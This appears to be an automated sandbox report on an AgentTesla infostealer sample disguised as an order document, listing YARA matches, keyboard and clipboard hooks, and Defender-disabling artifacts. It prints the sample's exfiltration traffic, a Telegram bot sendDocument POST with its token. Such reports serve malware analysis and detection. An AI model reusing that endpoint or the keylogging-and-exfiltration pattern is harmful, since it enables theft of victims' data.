Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307525322.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307540852.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349450295.0000000005EDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307573750.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307547855.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307630920.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307593958.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307525322.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmY
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303319313.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303225948.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304178747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303423712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303953142.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303491476.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303547143.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303113304.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304121403.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303924617.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303459883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303190453.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303711642.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303288048.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304055892.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304005746.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303259684.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303777091.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303357363.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/.
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302319712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302345072.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302299146.0000000005F17000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/0
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/9
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/FL
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302319712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302345072.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302299146.0000000005F17000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/K
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/QO
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/T
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-eo
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0m
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/hu-h
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303319313.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303225948.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/oie.
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301411124.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301391011.0000000005F09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://VEVgTqSNHWikc.org
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://VEVgTqSNHWikc.orgD
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.orgMozilla/5.0
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/
Source: WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/1644584536appdatamacDpmac
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org4
Source: unknown HTTP traffic detected: POST /bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad9d3fba18902Host: api.telegram.orgContent-Length: 1079Expect: 100-continueConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: api.ipify.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.4:49695 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49696 version: TLS 1.2
Source: unknown HTTPS traffic detected: 54.91.59.199:443 -> 192.168.2.4:49697 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49698 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\WsdnBq.exe
Contains functionality to register a low level keyboard hook
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA3790 SetWindowsHookExW 0000000D,00000000,?,? 4_2_06CA3790
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Window created: window name: CLIPBRDWNDCLASS

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.WsdnBq.exe.2e72288.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 0.2.ORDER (6256 OS)#391 PI.exe.30f22b8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 00000004.00000000.334155357.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000000.00000002.343033622.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1688, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: ORDER (6256 OS)#391 PI.exe
.NET source code contains very large array initializations
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bFD9F610Eu002d7B51u002d480Du002dB05Au002dE55A047CA86Au007d/u003991DE117u002d9CB5u002d4593u002dADFDu002d17D5BF3CC903.cs Large array initialization: .cctor: array initializer size 9257
Uses 32bit PE files
Source: ORDER (6256 OS)#391 PI.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.WsdnBq.exe.2e72288.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0.2.ORDER (6256 OS)#391 PI.exe.30f22b8.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 00000004.00000000.334155357.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000000.00000002.343033622.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1688, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Detected potential crypto function
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0160E87F 0_2_0160E87F
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0160E880 0_2_0160E880
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0160BFF4 0_2_0160BFF4
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07986698 0_2_07986698
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0798A290 0_2_0798A290
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0798ACC0 0_2_0798ACC0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_079815E0 0_2_079815E0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07985958 0_2_07985958
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0798F880 0_2_0798F880
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07982348 0_2_07982348
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0798ED18 0_2_0798ED18
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0798E880 0_2_0798E880
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0798F7ED 0_2_0798F7ED
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07991799 0_2_07991799
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0799B710 0_2_0799B710
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993F50 0_2_07993F50
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07998678 0_2_07998678
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0799CD48 0_2_0799CD48
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07998BB0 0_2_07998BB0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07990A08 0_2_07990A08
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07990040 0_2_07990040
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993F40 0_2_07993F40
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_079926F0 0_2_079926F0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_079926E2 0_2_079926E2
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07997E1E 0_2_07997E1E
